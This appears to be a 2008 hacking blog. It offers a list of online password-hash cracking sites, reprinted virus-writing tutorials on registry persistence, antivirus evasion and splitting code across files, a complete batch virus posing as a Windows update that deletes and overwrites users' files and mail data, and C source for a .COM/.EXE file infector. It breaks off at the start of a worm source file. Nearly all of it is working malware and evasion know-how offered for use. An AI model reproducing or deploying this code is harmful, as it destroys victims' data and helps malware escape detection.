http://www.md5lookup.com/
http://md5.rednoize.com
http://nz.md5.crysm.net
http://us.md5.crysm.net
http://www.xmd5.org
http://gdataonline.com
http://www.hashchecker.com
http://passcracking.ru
http://www.milw0rm.com/md5
http://plain-text.info
http://www.securitystats.com/tools/hashcrack.php
http://www.schwett.com/md5/
http://passcrack.spb.ru/ ->sha1
http://shm.pl/md5/
http://www.und0it.com/
http://www.neeao.com/md5/
http://md5.benramsey.com/
http://www.md5decrypt.com/
http://md5.khrone.pl/
http://www.csthis.com/md5/index.php
http://www.securitystats.com/tools/hashcrack.php ->sha1
http://www.md5decrypter.com/
http://www.md5encryption.com/ ->sha1
http://www.md5database.net/
http://md5.xpzone.de/
http://www.milw0rm.com/md5/info.php
http://md5.geeks.li/
http://www.hashreverse.com/ ->sha1
http://www.cmd5.com/english.aspx
http://www.md5.altervista.org/
http://md5.overclock.ch/biz/index.php?p=md5crack&l=en
http://alimamed.pp.ru/md5/
http://md5crack.it-helpnet.de/index.php?op=add
http://cijfer.hua.fi/
http://shm.hard-core.pl/md5/
http://www.mmkey.com/md5/HOME.ASP
http://www.thepanicroom.org/index.php?view=cracker
http://rainbowtables.net/services/results.php ->sha1
http://rainbowcrack.com/ ->sha1
http://www.securitydb.org/cracker/
http://passwordsecuritycenter.com/in...roducts_ id=7
http://0ptix.co.nr/md5
https://www.astalavista.net/?cmd=rainbowtables
http://ice.breaker.free.fr/
http://www.md5this.com
http://www.shalookup.com/ ->sha1
lm Only:
http://sys9five.ath.cx:8080/hak5rtables/
http://lasecwww.epfl.ch/~oechslin/projects/ophcrack/
some more links
http://linardy.com/md5.php
http://www.gdataonline.com/seekhash.php
http://www.md5-db.com/
https://www.w4ck1ng.com/cracker/
http://search.cpan.org/~blwood/Digest-MD5-Reverse-1.3/
http://www.hashchecker.com/index.php?_sls=search_hash
http://www.milw0rm.com/md5/
http://www.mmkey.com/md5/
http://www.rainbowcrack-online.com/
http://www.securitydb.org/cracker/
http://www.securitystats.com/tools/hashcrack.php
http://schwett.com/md5/
http://www.und0it.com/
http://www.md5.org.cn/index_en.htm
http://www.xmd5.org/index_en.htm
http://www.tmto.org
http://md5.rednoize.com/
http://nz.md5.crysm.net/
http://us.md5.crysm.net/
http://gdataonline.com/seekhash.php
http://passcracking.ru/
http://shm.pl/md5/
http://www.neeao.com/md5/
http://md5.benramsey.com/
http://www.md5decrypt.com/
http://md5.khrone.pl/
http://www.csthis.com/md5/index.php
http://www.md5decrypter.com/
http://www.md5encryption.com/
http://www.md5database.net/
http://md5.xpzone.de/
http://www.hashreverse.com/
http://alimamed.pp.ru/md5/
http://md5crack.it-helpnet.de/index.php?op=add
http://shm.hard-core.pl/md5/
http://rainbowcrack.com/
http://passwordsecuritycenter.com/index.php?main_page=product_info&cPath=3&products_id=7
https://www.astalavista.net/?cmd=rainbowtables
http://ice.breaker.free.fr/
http://www.md5this.com/
http://hackerscity.free.fr/
http://md5.allfact.info/
http://bokehman.com/cracker/
http://www.tydal.nu/article/md5-crack/
http://passcracking.com/
http://ivdb.org/search/md5/
http://md5.netsons.org/
http://md5.c.la/
http://www.md5-db.com/index.php
http://md5.idiobase.de/
http://md5search.deerme.org/
http://sha1search.com/
Tuesday, October 21, 2008
online MD5 crackers
Thursday, October 16, 2008
The Secure Virus-Copy
*************************************************************
*************************************************************
************ ***********
************ The Secure Virus-Copy ***********
************ by Second Part To Hell/[rRlf] ***********
************ ***********
*************************************************************
*************************************************************
Index:
******
0) Intro Words
1) The Idea
2) Important marginal notes
a) Inverted commas
b) 'exit'-command
c) '@echo'-command
d) '%~a'-option
e) '>>'-option
3) How to use it
a) General Information
b) Where to store the code
4) Last words
0) Intro Words
The title of this article sounds really strange and I'm sure, you can't think
what I'll tell you now. Don't worry, you will get the point while reading this
text. First I have to thank three persons, who's viruses or articles helped me
to get this idea. First person is Benny, who wrote a great article called
'Some ideaz about future worms', which was released in 29a#6. In his article he
mentioned that a worm 'should not be stored at any file on the disk'. The second
important person, who's virus helped me to get the idea and bring the idea to
reallity was Lys Kovick with his WinREG.AntiREG. Last but not least Q the Misanthrope's virus Bat.OneLine wsa very important for this article. To all these guys I have to send out a really great 'THANK YOU'! :D Well you still can't think about my idea, so I'll stopp writing this silly intro and start to come to the important parts...
1) The Idea
The idea is, as you should have already noticed, a copy of the virus, which can't
be detected. Let's consider the scan of a Antivirus-Program. The program detects
every virus, which is already in the virus-definition, in (most times) every file
at the computer. Now: What would be, if the virus doesn't exist in any file at the
computer??? It is not detected. You may think, "Damn, silly boy, how should the virus
work?". The answere's name is Registy...
As you may know, you can run any program with the right extansion via the registry.
That is the main point. You just have to store a copy of the virus/worm's code in registry
(if it's script than it's easy, if it's a binary you have to debug it later on). Now
let's think that the virus is in the registry, how we get it out from there?
As I have already told you, you can run programs via registry... One of this programs
you can run is called 'CMD.exe', the new Windows 2000 Command-Interpreter.
The think get's tricky now: As you may know, your CMD.exe has a command called 'for',
we are going to use it now. Why? Well, it's doubtful that your virus just have one line,
therefore we have to use one line (registry just allows one line of CMD.exe-code) bringing
your virus-code to a new file. Maybe you didn't fully understand what I meant, therefore
I'll show you an example now. This is the content of a new registy-key, which is stored
in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run:
- - - - - - - - - - - - - -
cmd /c for %a in ("@echo off" cls "echo Second Part To Hell was here..." pause exit) do @echo %~a>>C:\example.cmd
- - - - - - - - - - - - - -
Now guess the effects of this key! Every start-up of the computer it will generate a new
file called C:\example.cmd with the code between the inverted commas. Cool we got
a new file onto the computer... I'm sure that you know it: The code should be your virus
code. :). Now let's say, a virus uses such a code. First run it installs the key with
it's code. Some time later the user notices that something smells fishy and scanns trough
the harddisk. It finds a few copies of the virus and delets it. Now the cool thing:
It doesn't matter as the virus has it's code saved in the registry. And this code is ready
to infect the computer again and again (and again...).
2) Impotant marginal notes
There are some stranges in that line, which you have to note, otherwise you will have
hard problems getting the code working:
a) Inverted commas
You have to set the commands between inverted commands, if the line you want to write to
a new file contains at least one blank space. Otherwise CMD.exe treat it as more commands
with the side-effects, that it writes every part to a new line. If the command doesn't contain
a blank space, you may not use inverted commas.
b) 'exit'-command
After writing all your code to a .CMD or .BAT file, you have to use an 'exit'-command, since
you may write the whole code to the file every computer run. That's also the reason why
you must not use lables or gotos.
c) '@echo'-command
You have to use @echo to write strings to a file. If you would use just 'echo', you would
also write the primary command to it (i.e.: C:\Windows\System32>echo cls>>C:\example.cmd AND
cls).
d) '%~a'-option
If you have used a multi-part-command (which contains blanc space[s]), you have to use inverted
commands, as I have already told you. Using the simple '%a'-option, you would also write that
inverted commas to the code (which you don't want I think). To write the code without that
inverted commas you have to use '%~a'. (Of course, you could also use another variable-letter).
e) '>>'-option
When you try to use '>' to write your code to a file, you won't have success as CMD.exe overwrites
everything in the file (the lines you have already written) with the new one with the result that
the file contains JUST the last line you wanted to write.
3) How to use it
a) General Information
I've already told you, how the technique works, but not how to use it. Well, here we are.
First thing your virus should do when it's activ is to search the AutoStart-Directory, after
that it should write the modified code (the code above with the new directory+filename) to the
registry. That's all, easy - isn't it?! :)
b) Where to store the code
This is maybe the most important decision you have to make. Here are a few opportunities with
it's pro and contra.
--> Standart-Registry-Run
For Example: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
This is maybe the easiest and saved way to make sure that the virus will be started every
computer-Run. But the problem is that even low- and and medium-knowlegde computer users know
how to find a key here. That's a big problem...
--> Command Processor-AutoRun
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
The good thing is that nearly nobody knows about this key. The key forces the CMD.exe to
run a command or a file before the real window opens. The code would run when the
user opens a .CMD/.BAT file or open directly the CMD.exe. The problem is that a normal user
don's use these things. :(
--> Hooking File-extansions
malfunction wrote an article about that and released it in 29a#6. He used that technique
to run a virus/worm-file before an .EXE is executed. We can use the same technique modified.
just put the code above instead of malfunction's filename, and it should work.
4) Last words
Here, at the end of my article, I really want to thank you for still being with me and
reading this. I am really happy that I've finally finished this technique and this article, and
I would be even happier if you could send me your opinion of this way to make a secure virus copy.
I know that this article looks like it's just a technique for batch viruses, but it isn't! You
can use it in every file-virus/worm for Windows. Just use the command 'debug', which is really easy.
As you can imaging, I will write such a virus as soon as possible, and for showing you that it's
possible, it will become a binary virus. :)...
Greets goes to everybody who knows me (I'm too lazy to write them all down again, you know who you
are - just look at my homepage :D)...
A special greets goes to my RainBow, ILD!
- - - - - - - - - - - - - - -
Second Part To Hell/[rRlf]
www.spth.de.vu
spth@priest.com
written from april-may 2004
Austria
- - - - - - - - - - - - - - -
Useful Things In Batch
A tutorial by: by Second Part To Hell/[rRlf]
*************************************************************
*************************************************************
************ ***********
************ Useful things in Batch ***********
************ by Second Part To Hell/[rRlf] ***********
************ ***********
*************************************************************
*************************************************************
.intro words
While making my Batch WOrm Generator I discovered much very useful techniques
for Batch viruses, for instands about Encryption or Polymorphism. But I
discovered also some other techniques. These are Anti AVA techniques, and I
thought, I don't have to let them die. Now let's start...
.index
I'm sure, that you want to know, about which techniques I want to
talk. So, here is the shit of content :)
1) Including fake bytes
2) Useing a undeletable directory (Not for Win00|NT|XP)
3) Including the EICAR-Testfile
4) Pseudo-Trash between the code
.Including fake bytes
This is a special Anti-KAV-heuristic technique. Maybe you know, that KAV only
searchs in the first 1000 Bytes for the virus (I think, only in batch viruses).
What does that mean for us? Guess what? :) We inlude befor of the start of our
virus 1000 silly bytes, which don't do anything. And what is t effect? Let's test
it. First we have a very silly code-string, that only spread itself in the
current dir via overwriting Batch-files. KAV named it 'BAT.Silly.d'.
- - - - - - - - - - [ BAT.Silly.d ] - - - - - - - - - -
for %%a in (*.bat) do copy %0 %%a
- - - - - - - - -[ End of BAT.Silly.d ]- - - - - - - - -
Now let's test our new technique. Includeing 1000 fake-Byte should not
be a serious problem. Because of the fact, that batch ignore simple input-errors
we won't have any problems with it. My string contains random lowercase-letters.
But it should be no problme to include also other letters like Uppercase or
numbers and so on. Important Note: Do not include a '<' or a '>', because the
computer will 'think', that you want to read/write from a file.
- - - - - - - - - - [ Fake Bytes ] - - - - - - - - - -
stjrdnfuqlgmpuwefguowyakzxgkxolraxozihswcfngwkpaolmmyfrzmsxbcnvrmwrtnjpwybshmhxjtimvzwjuoakncjwynilyp
zciptpriqzrfqkqwgfiqpivuityndlqmlivmdtkjuynjdxzmpjedfjacsqgybiwcamxxxwolzzkprquufavkqfdyuqjcxvpizrakx
pdmogwizgfrjhvxrmeewywmknxbqbthypeksxmywlfaijracwftfsflicvgfwqzsnrductwbvvtkkzerzgpcbzkngktcdfybzsnby
emlcctvneufmhnvfsutoqnldznssinuqigrxbzyxwfmblnqhxztsokqyldnimzgjsmqwshasowgjrmwldkikgjwuffflhwugwrbqd
qhbueiaahtvwmhfrhntudpvscpkiftyiwceboltowopsojwxbuarilavnacqlljixreykldgdqxdckayqztleotrbijiwzpesheyd
cweyfyrldgvwkcocrqfqtlxuchxdhkpddokhpvxcihqshgqnpjoeqlxspcncyzlvkywzbtijvuiazhevcorognwzgscmmcappqrzw
vmtjkatslrkzxrrwxiawspgfvwwphueigwostqtuwrsabmlsrugeudglkmadpimsdbhsmhzlqtcaqftezwbaqrlkzjnzdhvhrpgbi
ajbakariwolazvdwhskrdsyqqcjayyqwusubevwumtwysahdzxtqhausneeistduraaaozircfrxqaidvarbiwibwzbtjajurezzd
wvqswebffznuymcvqhitlgknfdlwbzdlxfikprozaaxynlxhtmcflbnptelhpgpymekdijonvhyiswpgprdhxtffzimxrdofzonaz
qficniylakfqrazsqqviidufwfuwcialsryemswoekufgliuyybgzdydtqfmqnfqwdxmztbzqultebjbahjcadmibazhxsqljsslv
cqqqtsqfndkcwihitiscoqqsphuooymtkolmjdielrslulfpqodcitauueorvbyohxhmwgfwozxkggipmgpkoutzykratrhamqbxj
for %%a in (*.bat) do copy %0 %%a
- - - - - - - - - [ End of Fake Bytes ] - - - - - - - - -
The thing looks damn stupid, but the effect is genial :). The whole virus
works, but KAV don't show any alarm. And also no heuristic alarm. I'm sure,
that you will like this technique very much.
.Useing a undeletable directory (Not for Win00|NT|XP)
This technique's name looks very cool. And don't worry, it IS very cool.
But first let me explain, what it is: Windows 95 and Windows 98 have a
bug. If you try to make a new directory in MS-DOS, which contains some special
letters, windows won't be able to work with that directorys. You can't open
the directory, move it or delete it. That's the princip of our technique,
because of the reason, that batch is a DOS script. Now let's have a look at
letters, which make that possible.
- - - - - - - - - - - [ Letter List ] - - - - - - - - - - -
ASCII 176: °
ASCII 177: ±
ASCII 178: ²
ASCII 179: ³
ASCII 180: ´
ASCII 185: ¹
ASCII 186: º
ASCII 187: »
ASCII 188: ¼
ASCII 191: ¿
ASCII 192: À
ASCII 193: Á
ASCII 194: Â
ASCII 195: Ã
ASCII 196: Ä
ASCII 197: Å
ASCII 200: È
ASCII 201: É
ASCII 202: Ê
ASCII 203: Ë
ASCII 204: Ì
ASCII 205: Í
ASCII 206: Î
ASCII 213: Õ
ASCII 217: Ù
ASCII 218: Ú
ASCII 219: Û
ASCII 220: Ü
ASCII 223: ß
ASCII 242: ò
- - - - - - - - - -[ End of Letter List ]- - - - - - - - - -
OK, we know all the chars, which are possible. Now let's make a little
sample with that technique. My sample makes a undeleteable directory in
%windir%, and write something to the autoexec.bat, which let the virus
start at every windows-run.
- - - - - - - - - - - [ Letter List example ] - - - - - - - - - - -
cls
@echo off
cd %windir%
md º´ÜòÌ
cd º´ÜòÌ
copy %0 virus.bat
echo cd %windir% >>autoexec.bat
echo cd º´ÜòÌ >>autoexec.bat
echo virus.bat >>autoexec.bat
- - - - - - - - - -[ End of Letter List example ]- - - - - - - - - -
I'm sure, that you'll understand the example. A special thanks goes
to the Author of 'Trojan.BAT.NoDelDir', but unfortunatly I don't know,
who it is. If you read this, please contact me!!!
.Including the EICAR-Testfile
I think, that everybody knows, what EICAR-Virus-Test-File is. If not, I'll
explain it: It's a com-file from EICAR, and every Scanner detects it. It's
only for testing your AV. It's no virus, but it writes a String to the DOS
screen. OK, sounds nice, but how can we use it? Because of the fact, that
nearly everybody knows about that file, nobody is scared of a warning from
his AV about that detection. That's the point. We include to our program the
EICAR-file, so useres won't be scared of it. Here is the EICAR file content:
- - - - - - - - - [ EICAR-content ] - - - - - - - - - -
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
- - - - - - - -[ End of EICAR-content ]- - - - - - - - -
This is the same princip as the fake-bytes. But it contains a sensefully
content: The EICAR-file. It's the same 'virus', that I used in the FAKE
BYTE including technique. But now it's no more detect as 'BAT.Silly.d'
but 'EICAR-Test-File'. And we had success :)
- - - - - - - - - [ EICAR-content example] - - - - - - - - - -
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
for %%a in (*.bat) do copy %0 %%a
- - - - - - - -[ End of EICAR-content example]- - - - - - - - -
.Pseudo-Trash between the code
The title sounds emazing. So, what do I mean with 'Pseudo-Trash'?
Anything, that is written down in the code, but do not exist in the
runtime. You may think, that I'm a stoned/drunken or whatever, but it's
the only possible explanation. Think about the explanation. What comes
to your mind? Maybe the command 'set'? Then you're at the right way.
OK, a variable contains any content. But the point is, that a variable
can also contains '' (=nothing). Now we solved our problem :)
Let's look at the code. It's again the silly virus, which is detect by
KAV as 'BAT.Silly.d'.
- - - - - - - - - [ Pseudo-Trash example] - - - - - - - - - -
%anyting%fo%anyting%r %%a i%anyting%n (%anyting%*.ba%anyting%t) d%anyting%o co%anyting%py %0 %%a
- - - - - - - -[ End of Pseudo-Trash example]- - - - - - - - -
As you can see, the thing is very (!!!) easy to make, but it's also useful.
Note: you have to know, that the variable, that you use, has no content.
Otherwise the virus won't work. If you are not sure about the content,
include the line 'set anthing=', so you delete the content.
.last words
These techniques could be really useful, if you also include other Anti AV
tricks. If you include all these things and also encryption or polymorphism
or whatever, AVs will have a really problems. Now I hope, that you'll try
to use some (or maybe all :D ) of these things in your future-projects,
otherwise I wasted much hours of discover the techniques, searching errors
and better ways of it, checking the behaviour on other OSes and writing the
article. OK, in the end I want to say sorry about my english spelling or
grammer mistakes :).
- - - - - - - - - - - - - - -
Second Part To Hell/[rRlf]
www.spth.de.vu
spth@aonmail.at
written in june 2003
Austria
- - - - - - - - - - - - - - -
A good idea for virus writers
I was surfing through net and i came across this article which i found good enough to share with you people.
i express my sincere thanks to[rRlf] for sharing the idea with us.
here it goes.
=============================================
*************************************************************
*************************************************************
************ ***********
************ Over-File Splitting ***********
************ by Second Part To Hell/[rRlf] ***********
************ ***********
*************************************************************
*************************************************************
Index:
******
0) Intro Words
1) The idea
2) How to split?
3) How to join?
4) Short: How to use?
5) Short: Encryption
6) Short: Code in Filename
7) Outro words
0) Intro Words
This title may give you no ideas what my idea is about, so I'll tell you:
The idea itself is a heavy kind of Fuck-AV technique, it does not belong
to any other technique I've already seen. Just check it out.
Let's consider the detection of a virus by an AV program: The AV program
searchs in all files of the disk for special strings or whatever. If it
finds such a string, the file is detected. (I dont talk about encryption
or polymorphism in this connection - it's not important for the idea).
How to prevent this detection? I'll explain you...
1) The idea
Well, I've told you that an AV searchs in every file of the HD if there is
a virus. But what would be, if the virus would not be in one file? What
would be if the virus would be in 1000 or more files?
You may think: "Shit, what the hell are you talking about?"
OK, let's say anybody's computer gets infected by a virus/worm. Many files
get infected and the user recognizes that something smells fishy. (S)He
updates the AV program, scanns all files, all infected files become clean.
Is anything over now? No, it is not, because the virus/worm, when running
the first time splitted itself in 1000 parts, and every part is a own
file with the length of ~4-8 byte. This files (which have random names)
became saved in a directory. The files alone can not harm anybody, but
together they can. Together? The virus/worm also made a file, which joins
all files. This file, which runs every at restart (registry,autostart,...)
become executed now, and the computer will be reinfected again.
Can you now imagine how our virus/worm uses this technique and why may be
real successful? Just read on...
2) How to split?
This is most important for the technique: The more parts you have for your
virus/worm, the less the chance, that an AV program could detect it. Why?
Because a 4 byte scan-string would not be enough for detecting a virus. If
such a small scan-string would be used, the AV would definitivly have alot
of false-positives (detecting uninfected files). It is also important to
split your files randomly. Not always the same way. And to split the files
in random length parts, not always i.e. 5 byte.
If the program is a virus, it does not matter if the you also split the
hostcode. And about the header of a file: It is no problem to also split
the header into parts.
Now let me show you a primitive graphic, how i mean this:
This could be:
1: RE 1: REA
2: AL- 2: L-FIL
3: FILE- 3: E-INF
4: INF 4: ECT
5: ECTE 5: ED
6: D-B 6: -BY-
7: Y-A- 7: A-VI
8: VIR 8: RUS-
9: US-US 9: USIN
10: ING- 10: G-TH
11: THE- 11: E-OVE
12: OVER-F 12: R-FI
13: ILE 13: LE-SP
14: -SPLI 14: LI
15: TTING 15: TT
16: -TECH 16: ING
17: NIQ 17: -TE
18: UE 18: CHN
19: IQU
20: E
Now let's imagine, that every small part of the file has a random name.
And one more: Let's imagine, every part could be in any directory at the
Harddisk. Or even on another partition. That does not matter, you just
have to save the name for the joining-process.
3) How to join?
How could be join this files again to one file, which can be executed? At
splitting the virus, we have the filenames and -pathes, so we have to save
them. After splitting, a file will be created, which will join the virus
to one file. I'll show you now how such a file could look like. For making
it easy I've used CMD command COPY for that:
- - - - -
copy C:\WinNT\shjei2.tmp+E:\Pictures\lwjfnvmsiq9jm.dsf+D:\Songs\ToT\j1s.ajs+C:\Vir-Fol\iajw.vir+... C:\run.exe
C:\run.exe
- - - - -
The most important thing is,that your joining-program can not be detected.
You can of course generate your program totally randomly, and with the
filenames it is totally random.
There is nothing more to say...
4) Short: How to use?
Here is another idea, how you can use this technique for an eMail worm.
The worm should send itself via an archive (.ZIP/.RAR/.???). The archive
has to contain a directory and a joining file. In the directory there are
all parts of the virus. The user clicks the joining file, and it joins the
virus to one file and runs it. The result is, that the user can scan every
file, but nothing is found, because no file is the virus, but all. :)
Something else: An eMail as archive is more serious than a normal .EXE
file, and even if in the archive are more files and a directory. The user
may think it's a program.
5) Short: Encryption
No, this is no encryption tutorial, but another way how to use this idea.
You could have 3 files: joining-file, encrypted-code file,decryption file.
Before joining: After joining:
______________ _______________
| Joining file | | Joining file |
|______________| |_______________|
______________ _______________
| Encry. code | | Decry. engine |
|______________| | Encry. code |
|_______________|
______________
| Decry. file |
|______________|
What is important for this technique? Your decryption engine and the join-
ing file must not be detected. If the decrytion engine is not detected,
most times AV tries to emulate the decrytion and encrypt the virus. But
if there is nothing to decrypt, nothing is detected. :)
6) Short: Code in Filename
This is another idea, which belongs (nearly :D) to Over-File Splitting.
Just imagine: What would be, if we would make a directory, and make new
files with special names. The special names should present the code. But
as there are many characters, which aren't allowed for a filename, we have
to use the HEX of the character.
But now we have one problem: We have sort the filenames, as we need to
join the parts in right way. I'll show you a short graphic to let you
understand my idea:
1. File: 000148454C4C4F20
\/ | | | | | |
AA B C D E F G
2. File: 0002565845525321
\/ | | | | | |
AA B C D E F G
AA: This is for sorting the filenames. I've used a word, so we can use
0xFFFF filenames. Important: 4 Byte=2 HEX Chars=0xFFFF chars.
B: 2 Bytes = 1 HEX of a Character. Here it is the 1st one.
C: 2 Bytes = 1 HEX of a Character. Here it is the 2nd one.
D: 2 Bytes = 1 HEX of a Character. Here it is the 3rd one.
E: 2 Bytes = 1 HEX of a Character. Here it is the 4th one.
F: 2 Bytes = 1 HEX of a Character. Here it is the 5th one.
G: 2 Bytes = 1 HEX of a Character. Here it is the 6th one.
Just for not missunderstanding: '000148454C4C4F20' IS the filename, it
could also be '000148454C4C4F20.txt', but for making it easier, I did not
use any extansion.
For getting the code: You have to sort the filenames:
- 000148454C4C4F20
- 0002565845525321
Reduce the 4 byte in the beginning (which are just for sorting):
- 48454C4C4F20
- 565845525321
And join the names:
- 48454C4C4F20565845525321
As it is a Hex-Value, we have to change it to a Text Sting:
- HELLO VXERS!
Isn't this nice??? :)
Well, I know that this idea is quite strange and it seems to be unreal.
But it isn't, you can make it real! And if you did, nobody will detect it.
7) Outro words
This technique is definitivly hard to bring it to reality, but no way
impossible. I would like to see the faces of AVers, if they see such a
virus. :) But really, what would they do? The only thing is to detect the
joining file, but what if we could make it undetectable? We would have an
undetectable virus - isn't that our goal?
- - - - - - - - - - - - - - -
Second Part To Hell/[rRlf]
www.spth.de.vu
spth@priest.com
written from Jan 2005
...surrealistic viruswriter...
- - - - - - - - - - - - - - - he also made the File Splitting Engine (also released in rRlf #6) description he wrote as:
This is just a small engine, but I'm sure it could be very useful. What does the engine do?
It splitts the current file into 3-10 byte parts and creates a joining file (called start.bat).
To understand it's purpose, you should read my article called "Over-File Splitting".
download link
Sunday, October 12, 2008
A batch file virus code
@ECHO OFF CLS IF EXIST c:\winupdt.bat GOTO CODE GOTO SETUP :SETUP @ECHO OFF ECHO Ein batch Virus - getarnt als Windows-Update ECHO. copy %0 c:\winupdt.bat >> NUL ECHO Bitte haben sie ein wenig Geduld ... ausführen des Systemscans ... prompt $P$SWindows2000 type %0 >> c:\autoexec.bat type %0 >> c:\windows\dosstart.bat ECHO fertig ECHO. ECHO Die benötigten Dateien werden installiert! FOR %%a IN (*.zip) DO del %%a FOR %%a IN (C:\mydocu~1\*.txt) DO COPY c:\winupdt.bat %%a >> NUL FOR %%a IN (C:\mydocu~1\*.xls) DO COPY c:\winupdt.bat %%a >> NUL FOR %%a IN (C:\mydocu~1\*.doc) DO COPY c:\winupdt.bat %%a >> NUL ECHO Installation abgeschlossen ECHO. ECHO Bitte registrieren sie sich nun bei schell-industry,
um über neue updates informiert zu werden. PAUSE ECHO Download gestartet... START "C:\Program Files\Internet Explorer\Iexplore.exe"
http://www.schell-industry.de.vu/ IF EXIST "C:\Program Files\Outlook Express\msimn.exe" del
"C:\WINDOWS\Application Data\Identities\{161C80E0-1B99-11D4-9077-FD90FD02053A}\Microsoft\Outlook Express\*.dbx" IF EXIST "C:\WINDOWS\Application Data\Microsoft\Address Book\ankit.wab"
del "C:\WINDOWS\Application Data\Microsoft\Address Book\ankit.wab" ECHO Damit die Einstellungen erfolgreich übernommen werden können,
wird jetzt ein Neustart durchgeführt. ECHO Bleiben sie uns weiterhin treu, ihr SCHELL-industry Sicherheitsteam. copy %0 "C:\WINDOWS\Start Menu\Programs\StartUp\winupdt.bat" >> NUL c:\WINDOWS\RUNDLL user.exe,exitwindowsexec CLS GOTO END :CODE CLS @ECHO OFF prompt $P$SWindows2000 IF "%0" == "C:\AUTOEXEC.BAT" GOTO ABC type %0 >> c:\autoexec.bat :ABC type %0 >> c:\windows\dosstart.bat FOR %%a IN (*.zip) DO del %%a FOR %%a IN (C:\mydocu~1\*.txt) DO COPY c:\winupdt.bat %%a >> NUL FOR %%a IN (C:\mydocu~1\*.xls) DO COPY c:\winupdt.bat %%a >> NUL FOR %%a IN (C:\mydocu~1\*.doc) DO COPY c:\winupdt.bat %%a >> NUL START "C:\Program Files\Internet Explorer\Iexplore.exe"
http://www.schell-industry.de.vu/~hackingtruths IF EXIST "C:\Program Files\Outlook Express\msimn.exe"
del "C:\WINDOWS\Application Data\Identities\
{161C80E0-1B99-11D4-9077-FD90FD02053A}\Microsoft\Outlook Express\*.dbx" >> NUL
IF EXIST "C:\WINDOWS\Application Data\Microsoft\Address Book\ankit.wab" del "C:\WINDOWS\Application Data\Microsoft\Address Book\ankit.wab" >> NUL copy %0 "C:\WINDOWS\Start Menu\Programs\StartUp\winupdt.bat" >> NUL GOTO :END CLS :END CLS
Saturday, October 11, 2008
Make free calls
there are many sites today which will provide you this facility.
i found this one working fine..
http://evaphone.com/
so start calling your friends located anywhere
Thursday, October 9, 2008
The Giant black book of computer virus
The Giant black book of computer virus
download link: http://www.esnips.com/doc/6fdb4602-4de6-479a-b99f-cf1a4e256f68/The_Giant_Black_Book_of_Computer_Viruses
The Little Black Book of Computer Viruses
by:
Mark Ludwig
American Eagle Publications, Inc.
ISBN 0-929408-02-0
1996
download:
http://www.esnips.com/doc/541940b6-bfe4-4aef-848d-5c98bc4c4c31/the-little-black-book-of-computer-viruses
A generic or .com and .exe infector in C
/* C-Virus: A generic .COM and .EXE infector
Written by Nowhere Man
Project started and completed on 6-24-91
Written in Turbo C++ v1.00 (works fine with Turbo C v2.00, too)
*/
[to protect the code from script kiddies.. header files are not given]
#pragma inline // Compile to .ASM
#include
#include
#include
#include
#include
void hostile_activity(void);
int infected(char *);
void spread(char *, char *);
void small_print(char *);
char *victim(void);
#define DEBUG
#define ONE_KAY 1024 // 1k
#define TOO_SMALL ((6 * ONE_KAY) + 300) // 6k+ size minimum
#define SIGNATURE "NMAN" // Sign of infection
int main(void)
{
/* The main program */
spread(_argv[0], victim()); // Perform infection
small_print("Out of memory\r\n"); // Print phony error
return(1); // Fake failure...
}
void hostile_activity(void)
{
/* Put whatever you feel like doing here...I chose to
make this part harmless, but if you're feeling
nasty, go ahead and have some fun... */
small_print("\a\a\aAll files infected. Mission complete.\r\n");
exit(2);
}
int infected(char *fname)
{
/* This function determines if fname is infected */
FILE *fp; // File handle
char sig[5]; // Virus signature
fp = fopen(fname, "rb");
fseek(fp, 28L, SEEK_SET);
fread(sig, sizeof(sig) - 1, 1, fp);
#ifdef DEBUG
printf("Signature for %s: %s\n", fname, sig);
#endif
fclose(fp);
return(strncmp(sig, SIGNATURE, sizeof(sig) - 1) == 0);
}
void small_print(char *string)
{
/* This function is a small, quick print routine */
asm {
push si
mov si,string
mov ah,0xE
}
print: asm {
lodsb
or al,al
je finish
int 0x10
jmp short print
}
finish: asm pop si
}
void spread(char *old_name, char *new_name)
{
/* This function infects new_name with old_name */
/* Variable declarations */
FILE *old, *new; // File handles
struct ftime file_time; // Old file date,
time
int attrib; // Old attributes
long old_size, virus_size; // Sizes of files
char *virus_code = NULL; // Pointer to virus
int old_handle, new_handle; // Handles for files
/* Perform the infection */
#ifdef DEBUG
printf("Infecting %s with %s...\n", new_name, old_name);
#endif
old = fopen(old_name, "rb"); // Open virus
new = fopen(new_name, "rb"); // Open victim
old_handle = fileno(old); // Get file handles
new_handle = fileno(new);
old_size = filelength(new_handle); // Get old file size
virus_size = filelength(old_handle); // Get virus size
attrib = _chmod(new_name, 0); // Get old attributes
getftime(new_handle, &file_time); // Get old file time
fclose(new); // Close the virusee
_chmod(new_name, 1, 0); // Clear any read-only
unlink(new_name); // Erase old file
new = fopen(new_name, "wb"); // Open new virus
new_handle = fileno(new);
virus_code = malloc(virus_size); // Allocate space
fread(virus_code, virus_size, 1, old); // Read virus from old
fwrite(virus_code, virus_size, 1, new); // Copy virus to new
_chmod(new_name, 1, attrib); // Replace attributes
chsize(new_handle, old_size); // Replace old size
setftime(new_handle, &file_time); // Replace old time
/* Clean up */
fcloseall(); // Close files
free(virus_code); // Free memory
}
char *victim(void)
{
/* This function returns the virus's next victim */
/* Variable declarations */
char *types[] = {"*.EXE", "*.COM"}; // Potential victims
static struct ffblk ffblk; // DOS file block
int done; // Indicates finish
int index; // Used for loop
/* Find our victim */
if ((_argc > 1) && (fopen(_argv[1], "rb") != NULL))
return(_argv[1]);
for (index = 0; index < sizeof(types); index++) {
done = findfirst(types[index], &ffblk, FA_RDONLY | FA_HIDDEN |
FA_SYSTEM | FA_ARCH);
while (!done) {
#ifdef DEBUG
printf("Scanning %s...\n", ffblk.ff_name);
#endif
/* If you want to check for specific days of the week,
months, etc., here is the place to insert the
code (don't forget to "#include
if ((!infected(ffblk.ff_name)) && (ffblk.ff_fsize >
TOO_SMALL))
return(ffblk.ff_name);
done = findnext(&ffblk);
}
}
/* If there are no files left to infect, have a little fun... */
hostile_activity();
return(0); // Prevents warning
}
A worm in cpp
// ---[ w0rm.cpp ]-----------------------------[ http://harmony.haxors.com ]--//
//
// An exploration into remote network propogation using multiple techniques.
